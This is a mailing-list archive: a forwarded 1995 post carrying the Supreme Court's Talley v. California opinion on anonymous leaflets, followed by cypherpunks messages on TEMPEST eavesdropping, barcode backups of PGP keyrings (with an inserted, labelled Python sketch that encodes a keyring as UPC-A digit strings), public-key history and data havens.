From: Phil Agre <pagre@weber.ucsd.edu>
To: rre@weber.ucsd.edu
Subject: Supreme Court decision on anonymity
Resent-From: rre@weber.ucsd.edu
Reply-To: rre-maintainers@weber.ucsd.edu
X-Url: http://communication.ucsd.edu/pagre/rre.html
X-Mailing-List: <rre@weber.ucsd.edu> archive/latest/534
X-Loop: rre@weber.ucsd.edu
Precedence: list
Resent-Sender: rre-request@weber.ucsd.edu

Dave Banisar from the Electronic Privacy Information Center sent 
me the enclosed text of the US Supreme Court's decision denying the
constitutionality of laws banning anonymous leaflets.  This decision
has an obvious relevance to current debates about regulating anonymous
messages on the Internet.

Date: Tue, 17 Jan 1995 16:17:44 EST    
From: Dave Banisar <banisar@washofc.epic.org>
Subject: anonymity 

[...]

                TALLEY v. CALIFORNIA

          SUPREME COURT OF THE UNITED STATES

                     362 U.S. 60

            January 13-14, 1960, Argued  
               March 7, 1960, Decided


Certiorari to the Appellate Department of the Superior Court of
California, Los Angeles County.


 172 Cal. App. 2d Supp. 797, 332 P. 2d 447, reversed.

 A. L. Wirin and Hugh R. Manes argued the cause for petitioner.  With
them on the brief was Fred Okrand.

   Philip E. Grey argued the cause for respondent.  With him on the
brief was Roger Arnebergh.

   Shad Polier, Will Maslow, Leo Pfeffer and Joseph B. Robison filed
a brief for the American Jewish Congress, as amicus curiae, urging
reversal.

 Warren, Black, Frankfurter, Douglas, Clark, Harlan, Brennan,
Whittaker, Stewart

 MR. JUSTICE BLACK delivered the opinion of the Court.

   The question presented here is whether the provisions of a Los
Angeles City ordinance restricting the distribution of handbills
"abridge the freedom of speech and of the press secured against state
invasion by the Fourteenth Amendment of the Constitution." n1 The
ordinance, @ 28.06 of the Municipal Code of the City of Los Angeles,
provides:

   "No person shall distribute any hand-bill in any place under any
circumstances, which does not have printed on the cover, or the face
thereof, the name and address of the following:
 "(a) The person who printed, wrote, compiled or manufactured the
same.
 "(b) The person who caused the same to be distributed; provided,
however, that in the case of a fictitious person or club, in addition
to such fictitious name, the true names and addresses of the owners,
managers or agents of the person sponsoring said hand-bill shall also
appear thereon."

   The petitioner was arrested and tried in a Los Angeles Municipal
Court for violating this ordinance.  It was stipulated that the
petitioner had distributed handbills in Los Angeles, and two of them
were presented in evidence.  Each had printed on it the following:


   National Consumers Mobilization,

   Box 6533,

   Los Angeles 55, Calif.

   PLeasant 9-1576.

   The handbills urged readers to help the organization carry on a
boycott against certain merchants and businessmen, whose names were
given, on the ground that, as one set of handbills said, they carried
products of "manufacturers who will not offer equal employment
opportunities to Negroes, Mexicans, and Orientals." There also
appeared a blank, which, if signed, would request enrollment of the
signer as a "member of National Consumers Mobilization," and which
was preceded by a statement that "I believe that every man should
have an equal opportunity for employment no matter what his race,
religion, or place of birth."

   The Municipal Court held that the information printed on the
handbills did not meet the requirements of the ordinance, found the
petitioner guilty as charged, and fined him $ 10.  The Appellate
Department of the Superior Court of the County of Los Angeles
affirmed the conviction, rejecting petitioner's contention, timely
made in both state courts, that the ordinance invaded his freedom of
speech and press in violation of the Fourteenth and First Amendments
to the Federal Constitution. n2 172 Cal. App. 2d Supp. 797, 332 P. 2d
447. Since this was the highest state court available to petitioner,
we granted certiorari to consider this constitutional contention.
360 U.S. 928.

   In Lovell v. Griffin, 303 U.S. 444, we held void on its face an
ordinance that comprehensively forbade any distribution of literature
at any time or place in Griffin, Georgia, without a license.
Pamphlets and leaflets, it was pointed out, "have been historic
weapons in the defense of liberty" n3 and enforcement of the Griffin
ordinance "would restore the system of license and censorship in its
baldest form." Id., at 452. A year later we had before us four
ordinances each forbidding distribution of leaflets -- one in
Irvington, New Jersey, one in Los Angeles, California, one in
Milwaukee, Wisconsin, and one in Worcester, Massachusetts.  Schneider
v. State, 308 U.S. 147. Efforts were made to distinguish these four
ordinances from the one held void in the Griffin case.  The chief
grounds urged for distinction were that the four ordinances had been
passed to prevent either frauds, disorder, or littering, according to
the records in these cases, and another ground urged was that two of
the ordinances applied only to certain city areas.  This Court
refused to uphold the four ordinances on those grounds pointing out
that there were other ways to accomplish these legitimate aims
without abridging freedom of speech and press.  Frauds, street
littering and disorderly conduct could be denounced and punished as
offenses, the Court said.  Several years later we followed the
Griffin and Schneider cases in striking down a Dallas, Texas,
ordinance which was applied to prohibit the dissemination of
information by the distribution of handbills.  We said that although
a city could punish any person for conduct on the streets if he
violates a valid law, "one who is rightfully on a street . . .
carries with him there as elsewhere the constitutional right to
express his views in an orderly fashion . . . by handbills and
literature as well as by the spoken word." Jamison v. Texas, 318 U.S.
413, 416.

   The broad ordinance now before us, barring distribution of "any
hand-bill in any place under any circumstances," n4 falls precisely
under the ban of our prior cases unless this ordinance is saved by
the qualification that handbills can be distributed if they have
printed on them the names and addresses of the persons who prepared,
distributed  or sponsored them.  For, as in Griffin, the ordinance
here is not limited to handbills whose content is "obscene or
offensive to public morals or that advocates unlawful conduct." n5
Counsel has urged that this ordinance is aimed at providing a way to
identify those responsible for fraud, false advertising and libel.
Yet the ordinance is in no manner so limited, nor have we been
referred to any legislative history indicating such a purpose.
Therefore we do not pass on the validity of an ordinance limited to
prevent these or any other supposed evils.  This ordinance simply
bars all handbills under all circumstances anywhere that do not have
the names and addresses printed on them in the place the ordinance
requires.

   There can be no doubt that such an identification requirement
would tend to restrict freedom to distribute information and thereby
freedom of expression. "Liberty of circulating is as essential to
that freedom as liberty of publishing; indeed, without the
circulation, the publication would be of little value." Lovell v.
Griffin, 303 U.S., at 452.

   Anonymous pamphlets, leaflets, brochures and even books have
played an important role in the progress of mankind.  Persecuted
groups and sects from time to time throughout history have been able
to criticize oppressive practices and laws either anonymously or not
at all.  The obnoxious press licensing law of England, which was also
enforced on the Colonies was due in part to the knowledge that
exposure of the names of printers, writers and distributors would
lessen the circulation of literature critical of the government.  The
old seditious libel cases in England show the lengths  to which
government had to go to find out who was responsible for books that
were obnoxious  to the rulers.  John Lilburne was whipped, pilloried
and fined for refusing to answer questions designed to get evidence
to convict him or someone else for the secret distribution of books
in England.  Two Puritan Ministers, John Penry and John Udal, were
sentenced to death on charges that they were responsible for writing,
printing or publishing books. n6 Before the Revolutionary War
colonial patriots frequently had to conceal their authorship or
distribution of literature that easily could have brought down on
them prosecutions by English-controlled courts.  Along about that
time the Letters of Junius were written and the identity of their
author is unknown to this day. n7 Even the Federalist Papers, written
in favor of the adoption of our Constitution, were published under
fictitious names.  It is plain that anonymity has sometimes been
assumed for the most constructive purposes.

   We have recently had occasion to hold in two cases that there are
times and circumstances when States may not compel members of groups
engaged in the dissemination of ideas to be publicly identified.
Bates v. Little Rock, 361 U.S. 516; N. A. A. C. P. v. Alabama, 357
U.S. 449, 462. The reason for those holdings was that identification
and fear of reprisal might deter perfectly peaceful discussions of
public matters of importance.  This broad Los Angeles ordinance is
subject to the same infirmity.  We hold that it, like the Griffin,
Georgia, ordinance, is void on its face.

   The judgment of the Appellate Department of the Superior Court of
the State of California is reversed and the cause is remanded to it
for further proceedings not inconsistent with this opinion.

   It is so ordered.

Footnotes

   n1 Schneider v. State, 308 U.S. 147, 154. Cf. Lovell v. Griffin,
303 U.S. 444, 450.

  n2 Petitioner also argues here that the ordinance both on its face
and as construed and applied "arbitrarily denies petitioner equal
protection of the laws in violation of the Due Process and Equal
Protection" Clauses of the Fourteenth Amendment.  This argument is
based on the fact that the ordinance applies to handbills only, and
does not include within its proscription books, magazines and
newspapers.  Our disposition of the case makes it unnecessary to
consider this contention.

   n3 The Court's entire sentence was: "These [pamphlets and
leaflets] indeed have been historic weapons in the defense of
liberty, as the pamphlets of Thomas Paine and others in our own
history abundantly attest." It has been noted that some of Thomas
Paine's pamphlets were signed with pseudonyms.  See Bleyer, Main
Currents in the History of American Journalism (1927), 90-93.
Illustrations of other anonymous and pseudonymous pamphlets and other
writings used to discuss important public questions can be found in
this same volume.

   n4 Section 28.00 of the Los Angeles Municipal Code defines
"handbill" as follows: "'HAND-BILL' shall mean any hand-bill, dodger,
commercial advertising circular, folder, booklet, letter, card,
pamphlet, sheet, poster, sticker, banner, notice or other written,
printed or painted matter calculated to attract attention of the
public."

  n5 Lovell v. Griffin, 303 U.S., at 451.

   n6 Penry was executed and Udal died as a result of his
confinement.  1 Hallam, The Constitutional History of England (1855),
205-206, 232.

   n7 In one of the letters written May 28, 1770, the author asked
the following question about the tea tax imposed on this country, a
question which he could hardly have asked but for his anonymity:
 "What is it then, but an odious, unprofitable exertion of a
speculative right, and fixing a badge of slavery upon the Americans,
without service to their masters?" 2 Letters of Junius (1821) 39.


MR. JUSTICE HARLAN, concurring.

   In judging the validity of municipal action affecting rights of
speech or association protected against invasion by the Fourteenth
Amendment, I do not believe that we can escape, as Mr. Justice
Roberts said in Schneider v. State, 308 U.S. 147, 161, "the delicate
and difficult task" of weighing "the circumstances" and appraising
"the substantiality of the reasons advanced in support of the
regulation of the free enjoyment of" speech.  More recently we have
said that state action impinging on free speech and association will
not be sustained unless the governmental interest asserted to support
such impingement is compelling.  See N. A. A. C. P. v. Alabama, 357
U.S. 449, 463, 464; Sweezy v. New Hampshire, 354 U.S. 234, 265
(concurring opinion); see also Bates v. Little Rock, 361 U.S. 516.

   Here the State says that this ordinance is aimed at the prevention
of "fraud, deceit, false advertising, negligent use of words,
obscenity, and libel," in that it will aid in the detection of those
responsible for spreading material of that character.  But the
ordinance is not so limited, and I think it will not do for the
State simply to say that the circulation of all anonymous handbills
must be suppressed in order to identify the distributors of those
that may be of an obnoxious character.  In the absence of a more
substantial showing as to Los Angeles' actual experience with the
distribution of obnoxious handbills, * such a generality is for me
too remote to furnish a constitutionally acceptable justification for
the deterrent effect on free speech which this all-embracing
ordinance is likely to have.


   On these grounds I concur in the judgment of the Court.

Footnotes:


   * On the oral argument the City Attorney stated:

   "We were able to find out that prior to 1931 an effort was made by
the local Chamber of Commerce, urging the City Council to do
something about these handbills and advertising matters which were
false and misleading -- had no names of sponsors.  They were
particularly interested in the fictitious name. They said, 'Who are
these people that are distributing; who are advertising; doing things
of that sort?' The meager record that we were able to find indicates
that a request from the Council to the City Attorney as to their
legal opinion on this subject [sic].  The City Attorney wrote back
and formed the conclusion that distribution of handbills, pamphlets,
or other matters, without the name of the fictitious firm or officers
would be legal [sic].  Thereafter in the early part of 1932 an
ordinance was drafted, and submitted to the City Council, and
approved by them, which related to the original subject -- unlawful
for any person, firm or association to distribute in the city of Los
Angeles any advertisement or handbill -- or any other matter which
does not have the names of the sponsors of such literature."


MR. JUSTICE CLARK, whom MR. JUSTICE FRANKFURTER and MR. JUSTICE
WHITTAKER join, dissenting.

   To me, Los Angeles' ordinance cannot be read as being void on its
face. Certainly a fair reading of it does not permit a conclusion
that it prohibits the distribution of handbills "of any kind at any
time, at any place, and in any manner," Lovell v. Griffin, 303 U.S.
444, 451 (1938), as the Court seems to conclude.  In Griffin, the
ordinance completely prohibited the unlicensed distribution of any
handbills.  As I read it, the ordinance here merely prohibits the
distribution of a handbill which does not carry the identification of
the  name of the person who "printed, wrote, compiled . . .
manufactured [or] . . . caused" the distribution of it.  There could
well be a compelling reason for such a requirement.  The Court
implies as much when it observes that Los Angeles has not "referred
to any legislative history indicating" that the ordinance was adopted
for the purpose of preventing "fraud, false advertising and libel."
But even as to its legislative background there is pertinent
material which the Court overlooks.  At oral argument, the City's
chief law enforcement officer stated that the ordinance was
originally suggested in 1931 by the Los Angeles Chamber of Commerce
in a complaint to the City Council urging it to "do something about
these handbills and advertising matters which were false and
misleading." Upon inquiry by the Council, he said, the matter was
referred to his office, and the Council was advised that such an
ordinance as the present one would be valid.  He further stated that
this ordinance, relating to the original inquiry of the Chamber of
Commerce, was thereafter drafted and submitted to the Council.  It
was adopted in 1932.  In the face of this and the presumption of
validity that the ordinance enjoys, the Court nevertheless strikes it
down, stating that it "falls precisely under the ban of our prior
cases." This cannot follow, for in each of the three cases cited, the
ordinances either "forbade any distribution of literature . . .
without a license," Lovell v. Griffin, supra, or forbade, without
exception, any distribution of handbills on the streets, Jamison v.
Texas, 318 U.S. 413 (1943); or, as in Schneider v. State, 308 U.S.
147 (1939), which covered different ordinances in four cities, they
were either outright bans or prior restraints upon the distribution
of handbills.  I, therefore, cannot see how the Court can conclude
that the Los Angeles ordinance here "falls precisely" under any of
these cases.  On the contrary, to my mind, they neither control this
case nor are apposite to it.  In fact, in Schneider, depended upon by
the Court, it was held, through Mr. Justice Roberts, that, "In every
case . . . where legislative abridgment of the rights is asserted,
the courts should be astute to examine the effect of the challenged
legislation . . . weigh the circumstances and . . . appraise the
substantiality of the reasons advanced . . . ." Id., at 161. The
Court here, however, makes no appraisal of the circumstances, or the
substantiality of the claims of the litigants, but strikes down the
ordinance as being "void on its face." I cannot be a party to using
such a device as an escape from the requirements of our cases, the
latest of which was handed down only last month.  Bates v. Little
Rock, 361 U.S. 516.  n1

   Therefore, before passing upon the validity of the ordinance, I
would weigh the interests of the public in its enforcement against
the claimed right of Talley.  The record is barren of any claim, much
less proof, that he will suffer any injury whatever by identifying
the handbill with his name.  Unlike N. A. A. C. P. v. Alabama, 357
U.S. 449 (1958), which is relied upon, there is neither allegation
nor proof that Talley or any group sponsoring him would suffer
"economic reprisal, loss of employment, threat of physical coercion
[or] other manifestations of public hostility." Id., at 462. Talley
makes no showing whatever to support his contention  that a restraint
upon his freedom of speech will result from the enforcement of the
ordinance.  The existence of such a restraint is necessary before we
can strike the ordinance down.

   But even if the State had this burden, which it does not, the
substantiality of Los Angeles' interest in the enforcement of the
ordinance sustains its validity.  Its chief law enforcement officer
says that the enforcement of the ordinance prevents "fraud, deceit,
false advertising, negligent use of words, obscenity, and libel,"
and, as we have said, that such was its purpose.  In the absence of
any showing to the contrary by Talley, this appears to me entirely
sufficient.

   I stand second to none in supporting Talley's right of free speech
-- but not his freedom of anonymity.  The Constitution says nothing
about freedom of anonymous speech.  In fact, this Court has approved
laws requiring no less than Los Angeles' ordinance.  I submit that
they control this case and require its approval under the attack made
here.  First, Lewis Publishing Co. v. Morgan, 229 U.S. 288 (1913),
upheld an Act of Congress requiring any newspaper using the
second-class mails to publish the names  of its editor, publisher,
owner, and stockholders.  39 U. S. C. @ 233. Second, in the Federal
Regulation of Lobbying Act, 2 U. S. C. @ 267, Congress requires those
engaged in lobbying to divulge their identities and give "a modicum
of information" to Congress. United States v. Harriss, 347 U.S. 612,
625 (1954).  Third, the several States have corrupt practices acts
outlawing, inter alia, the distribution of anonymous publications
with reference to political candidates. n2 While these statutes are
leveled at political campaign and election practices, the underlying
ground sustaining their validity applies with equal force here.

   No civil right has a greater claim to constitutional protection or
calls for more rigorous  safeguarding than voting rights.  In this
area the danger of coercion and reprisals -- economic and otherwise
-- is a matter of common knowledge.  Yet these statutes, disallowing
anonymity in promoting one's views in election campaigns, have
expressed the overwhelming public policy of the Nation.  Nevertheless
the Court is silent about this impressive authority relevant to the
disposition of this case.

   All three of the types of statutes mentioned are designed to
prevent the same abuses -- libel, slander, false accusations, etc.
The fact that some of these statutes are aimed at elections,
lobbying, and the mails makes their restraint no more palatable, nor
the abuses they prevent less deleterious to the public interest, than
the present ordinance.

   All that Los Angeles requires is that one who exercises his right
of free speech through writing or distributing handbills identify
himself just as does one who speaks from the platform.  The ordinance
makes for the responsibility in writing that is present in public
utterance.  When  and if the application of such an ordinance in a
given case encroaches on First Amendment freedoms, then will be soon
enough to strike  that application down.  But no such restraint has
been shown here.  After all, the public has some rights against which
the enforcement of freedom of speech would be "harsh and arbitrary in
itself." Kovacs v. Cooper, 336 U.S. 77, 88 (1949). We have upheld
complete proscription of uninvited door-to-door canvassing as an
invasion of privacy. Breard v. Alexandria, 341 U.S. 622 (1951). Is
this less restrictive than complete freedom of distribution --
regardless of content -- of a signed handbill? And commercial
handbills may be declared verboten, Valentine v. Chrestensen, 316
U.S. 52 (1942), regardless of content or identification.  Is Talley's
anonymous handbill, designed to destroy the business of a commercial
establishment, passed out at its very front door, and attacking its
then lawful commercial practices, more comportable with First
Amendment freedoms?  I think not.  Before we may expect international
responsibility among nations, might not it be well to require
individual responsibility at home?  Los Angeles' ordinance does no
more.

   Contrary to petitioner's contention, the ordinance as applied does
not arbitrarily deprive him of equal protection  of the law.  He
complains that handbills are singled out, while other printed media
-- books, magazines, and newspapers -- remain unrestrained.  However,
"the problem of legislative classification is a perennial one,
admitting of no doctrinaire definition.  Evils in the same field may
be of different dimensions and proportions, requiring different
remedies. . . .  Or the reform may take one step at a time,
addressing itself to the phase of the problem which seems most acute
to the legislative mind. . . .  The prohibition of the Equal
Protection Clause goes no further than the invidious discrimination.
[I] cannot say that that point has been reached here." Williamson v.
Lee Optical Co., 348 U.S. 483, 489 (1955).

   I dissent.

Footnotes

   n1 "When it is shown that state action threatens significantly to
impinge upon constitutionally protected freedom it becomes the duty
of this Court to determine whether the action bears a reasonable
relationship to the achievement of the governmental purpose asserted
as its justification." 361 U.S., at 525.

   n2 Thirty-six States have statutes prohibiting the anonymous
distribution of materials relating to elections.  E. g.: Kan. Gen.
Stat., 1949, @ 25-1714; Minn. Stat. Ann. @ 211.08; Page's Ohio Rev.
Code Ann. @ 3599.09; Purdon's Pa. Stat. Ann., Title 25, @ 3546.


_________________________________________________________________________
David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301  * ftp/gopher/wais cpsr.org 
Washington, DC 20003                * HTTP://epic.digicash.com/epic






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Wed, 18 Jan 95 12:09:51 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: TEMPEST
Message-ID: <199501182009.AA11815@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:

>TEMPEST has very little to do with Cypherpunks goals, actually. First,
>buying such a gadget, tweaking it, exploring capabilities, etc., would
>lead to what? The ability to park a van in front of someone's house
>and--maybe--monitor their screens? We already know this is possible.
>(You all knew that, didn't you?)

If a Cypherpunk goal is to champion electronic privacy, it seems to me that
it is important to fully understand any threats to the methods used to
ensure privacy.  The old Sun Tzu "know your enemy" philosophy.  If I was
running a Data Haven, I'd want to understand how and if my system could be
passively eavesdropped on, and what countermeasures to take to minimize the
risk.  (Second or third down the list from knowing my encryption algorithm
was secure.)

Granted, I'd spend more efforts with firewalls because a hacker/cracker
attack would be a more realistic threat, but if there was even the most
remote chance that a government agency/well-funded concern with TEMPEST
capability was interested in me, I'd sure like to make their job more difficult.

The thing that I find frustrating about TEMPEST, is most informed people say
"yes, it's possible," but I have encountered only breadcrumbs of real-world,
technical information and sources on it (the VanEck article, the BBC tape,
Grady Ward's paper, etc.).  This is what prompted the original message to
the list.  Yes, TEMPEST is real.  But what I'm trying to do is shift out
TEMPEST reality (and capabilities) from the magical black-box in parked vans
tales.

Joel McNamara
joelm@eskimo.com - finger for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 18 Jan 95 13:09:58 PST
To: joelm@eskimo.com (Joel McNamara)
Subject: Re: TEMPEST
In-Reply-To: <199501182009.AA11815@mail.eskimo.com>
Message-ID: <199501182032.MAA19257@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Joel McNamara wrote:

(quoting me)
> >TEMPEST has very little to do with Cypherpunks goals, actually. First,
> >buying such a gadget, tweaking it, exploring capabilities, etc., would
> >lead to what? The ability to park a van in front of someone's house
> >and--maybe--monitor their screens? We already know this is possible.
> >(You all knew that, didn't you?)
> 
> If a Cypherpunk goal is to champion electronic privacy, it seems to me that
> it is important to fully understand any threats to the methods used to
> ensure privacy.  The old Sun Tzu "know your enemy" philosophy.  If I was
> running a Data Haven, I'd want to understand how and if my system could be
> passively eavesdropped on, and what countermeasures to take to minimize the
> risk.  (Second or third down the list from knowing my encryption algorithm
> was secure.)

Sure, let us know what you find. I'm not being catty here; I'm making
a serious point about return on investment. My guess is that getting a
reasonable Van Eck capability could cost $10K, maybe less, maybe more.
And what would this show that we basically don't already know in
principle? (We've all seen televisions showing "interference" from
computers, so we know that signals are getting out....)

And if nothing is seen with our $10K of equipment, what does this
prove against an attacker who can easily afford to spend 20 or 30
times that amount to equip a van?

Cypherpunks have been exploiting technology that is comparatively
_much cheaper_ and which changes the equation.

But, again, let me not discourage you (Joel) from becoming our expert
on TEMPEST and Van Eck emissions. You may find it fun, and maybe even
profitable (consulting for corporations to harden their sites, for
example). 

I just object to the "we ought to be doing this" mentality. In
general, for reasons many of us have written about here before, and in
particular, because I think spending $10,000 to prove what we already
know--that RF emissions can be detected and demodulated--is a poor use
of money. That $10K would go a long way to getting PGP Phone finished.

> The thing that I find frustrating about TEMPEST, is most informed people say
> "yes, it's possible," but I have encountered only breadcrumbs of real-world,
> technical information and sources on it (the VanEck article, the BBC tape,
> Grady Ward's paper, etc.).  This is what prompted the original message to
> the list.  Yes, TEMPEST is real.  But what I'm trying to do is shift out
> TEMPEST reality (and capabilities) from the magical black-box in parked vans
> tales.

Then go for it. Make this your specialty, your contribution to the
Cause. But beware of empty exhortations that "somebody ought to work
on this."

"We have met the somebody, and he is us."

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. D.C. Williams" <dcwill@ee.unr.edu>
Date: Wed, 18 Jan 95 09:49:27 PST
To: cypherpunks@toad.com
Subject: Re: Key backup (was: How do I know . ..)
Message-ID: <199501181754.MAA24686@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

'Eric Hughes' was reported to have written:

> You use your friends now because off-site storage facilities are not
> yet available.  The software for distributed remote backup has yet to
> make this operation transparent.

Even when such a system becomes available, I don't think that it will
obviate the need for relatively secure on-site storage. Banks and safe
deposit boxes haven't completely precluded the demand for safes at home.
Many people don't trust banks. Fewer will completely trust cypherbanks
and distributed.net.storage systems.

> I suspect that most private keys in the future will be held in PCMCIA
> cards (initially) and then their smaller replacements.  Backing up a
> private key to these allows use of a safe deposit box.

Safe deposit boxes, by virtue of their accessibility to law enforcement,
are subject to search and seizure under court order and are sealed
in certain cases (probate). This makes them likely to be the first place
to look when the Feds decide that we can't have keys anymore. Personally 
speaking, I'll take my chances with secure "on-site" storage, even if I 
choose a location other than my own home or business. 

>    If it's still "passphrase-protected", an attacker would a) have to know
>    what to look for

> For scalability, most people will use some standard method, whatever
> it is.  This limits the search space of an opponent.

If barcoding is our example, what's to prevent it from being printed
in a format selected by the user? Printing on a small paper/plastic
label and affixing it (in whole or in parts) to other objects effectively
disguises it as a UPC label. You would have to know which labels are
a part of a keyring for them to have any significance. Even George
Bush now knows that every commercial product has a UPC on it somewhere.
Many stores add their own UPC sticker to merchandise for inventory
control purposes. Break a keyring into 4 or 5 pieces (whatever it takes
to make each piece comparable in size and appearance to the standard UPC
label), stick them on selected objects, and let someone who knows what
they're looking for try and reconstruct your keyring from the universe of
combinations of UPC labels found around your home. With an unknown number
of parts, this seems like a practically insurmountable problem. This 
becomes a stego problem as well as a key decryption problem.

With barcoding as the standard, another person prints his key on a small
unmarked card and hides it somewhere deemed to be secure by him. The
UPC-label attack fails because his keyring isn't disguised as UPC product
labels. How does the attacker know what to look for?

True Paranoids could devise some sort of "invisible ink" method,
requiring UV or heat exposure before the barcode becomes visible.
Now your backup key looks like a blank sheet of paper. ;-)

My point is that with a regular barcode-generation program and a laser
printer, an infinite number of formats and combinations can be created
by individual users to suit their needs. You can print an 8.5 x 11 sheet
with the title "PGP secret keyring" and put it in a frame hung on the
wall, or you can print a bunch of split key pseudo-UPC labels and put one 
on the back of the frame to disguise it as the manufacturer's product label.
One method is secure and the other is not, but the specifics are left
to the user because the method is sufficiently flexible to allow a number
of formats. I contend that anyone capable of running PGP properly is
also capable of using a barcode printing program without difficulty
(check out the back of PC Magazine). All that would need to be written
is a short routine to convert the encrypted keyring into a format
suitable as input for a program of this nature. Heck, there's probably
a PD barcode program out there already.

My question to the respected elders of this list is "how or why is
this type of key backup system insecure, if it is in fact insecure?"


=D.C. Williams	<dcwill@ee.unr.edu>

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLx1VlyoZzwIn1bdtAQFT5QF+N2RGEpj37fT0iCUnPdnkaUWItbC+HHAj
eFAyBU7fNOnHGwiriHnuEcYaZxBV6lst
=l3PL
-----END PGP SIGNATURE-----
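
The "short routine" the message above asks for, sketched as an added example that is not part of the original post or of any PGP or barcode program: it frames an already-encrypted keyring blob into 12-digit UPC-A strings with valid check digits and reassembles them. The 2-byte length prefix, the 4-bytes-per-label packing, the leading digit "0" and all function names are assumptions made here; the labels must be presented in their original order, which the format does not record.

```python
"""Frame an encrypted keyring blob as UPC-A digit strings and back (illustrative)."""
import os
import struct

BYTES_PER_LABEL = 4         # 4 bytes fit in the 10 free digits of one label
NUMBER_SYSTEM_DIGIT = "0"   # assumed leading digit, as on ordinary retail codes


def upc_check_digit(first11: str) -> int:
    """Standard UPC-A check digit over the first 11 digits."""
    if len(first11) != 11 or not (first11.isascii() and first11.isdigit()):
        raise ValueError("need exactly 11 decimal digits")
    odd = sum(int(c) for c in first11[0::2])    # positions 1, 3, ..., 11
    even = sum(int(c) for c in first11[1::2])   # positions 2, 4, ..., 10
    return (10 - (3 * odd + even) % 10) % 10


def labels_needed(n_bytes: int) -> int:
    """Number of labels for a blob of n_bytes, including the length prefix."""
    return -(-(n_bytes + 2) // BYTES_PER_LABEL)


def encode_labels(blob: bytes) -> list:
    """Split blob into 12-digit strings suitable as input to a barcode printer."""
    if len(blob) > 0xFFFF:
        raise ValueError("blob too large for the 2-byte length prefix")
    framed = struct.pack(">H", len(blob)) + blob
    framed += b"\x00" * (-len(framed) % BYTES_PER_LABEL)   # pad the last label
    labels = []
    for off in range(0, len(framed), BYTES_PER_LABEL):
        value = int.from_bytes(framed[off:off + BYTES_PER_LABEL], "big")
        first11 = NUMBER_SYSTEM_DIGIT + f"{value:010d}"
        labels.append(first11 + str(upc_check_digit(first11)))
    return labels


def decode_labels(labels) -> bytes:
    """Rebuild the blob from labels given in their original order."""
    framed = bytearray()
    for n, label in enumerate(labels):
        if len(label) != 12 or not (label.isascii() and label.isdigit()):
            raise ValueError(f"label {n}: not a 12-digit code")
        if upc_check_digit(label[:11]) != int(label[11]):
            raise ValueError(f"label {n}: check digit mismatch (misread?)")
        value = int(label[1:11])
        if value > 0xFFFFFFFF:
            raise ValueError(f"label {n}: payload out of range")
        framed += value.to_bytes(BYTES_PER_LABEL, "big")
    if len(framed) < 2:
        raise ValueError("no labels supplied")
    (length,) = struct.unpack(">H", framed[:2])
    if length > len(framed) - 2:
        raise ValueError("labels missing: fewer bytes than the prefix promises")
    return bytes(framed[2:2 + length])


if __name__ == "__main__":
    # Constructed stand-in for a passphrase-encrypted keyring file.
    keyring = os.urandom(37)
    labels = encode_labels(keyring)
    for label in labels:
        print(label)
    assert decode_labels(labels) == keyring
    print(len(labels), "labels for", len(keyring), "bytes")
```

The check digit only catches misreads; it does not authenticate the labels, so the protection of the key still rests on the keyring's own encryption.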




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Wed, 18 Jan 95 11:42:18 PST
To: cypherpunks@toad.com
Subject: Re: EE Times on PRZ
Message-ID: <9501181942.AA27518@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


Strick wrote:
>THUS SPAKE jalicqui@prairienet.org (Jeff Licquia):
># Another quote from the article posted elsewhere said that, "PGP, which is
># based on the Diffie-Hellman public-key technology developed in the 1970s..."
># This is technically true, since all public-key work (including RSA) is based
># to some extent on DH.  It could be, however, that the author is confusing
>
>DH uses "discrete log" as the hard problem, and very straightforward
>mathematics.
>
>RSA uses "factoring" as the hard problem, and a very clever back door.
>
>How do you decide if one is based on the other?

Sorry, I wasn't perfectly clear.  Of course, RSA is not based on
Diffie-Hellman specifically; what I mean is that all public-key work is
based on that general paper, which "invented" public-key cryptography.  I
think this very confusion may be plaguing the writer of the aforementioned
article.

># public-key technology with Diffie-Hellman public-key in particular, which
># (as I understand it) is not particularly secure.
>
>It's still up in the air, isn't it, whether the discrete log or 
>factoring is the harder to crack.   My intuition is they're the
>same hard.

It was my impression that DH had a further weakness not related to the
difficulty of the hard problem.  As my copy of Schneier is at home, I must
defer to ignorance at this point.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Wed, 18 Jan 95 11:26:02 PST
To: Black Unicorn <unicorn@access.digex.net>
Subject: [ DH Code ]
In-Reply-To: <Pine.SUN.3.91.950117154344.11572B-100000@access4.digex.net>
Message-ID: <Pine.SV4.3.91.950118141055.7755A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> Are there implemented DH codes running around anywhere?

   DH code is easy - using PGP and perl you can build a simple one in a 
matter of hours.  

   But: where's the market?  The only people I've ever known to need a 
'data haven' were a group of people who'd obtained the source code to a 
major commercial operating system and used a freenet account and ftp to 
transfer it.  (40 mB+, I gather).  

   I can see building one - it doesn't seem at all difficult.  But I 
don't see how I could be reimbursed for the disk space and bandwidth.

-jon

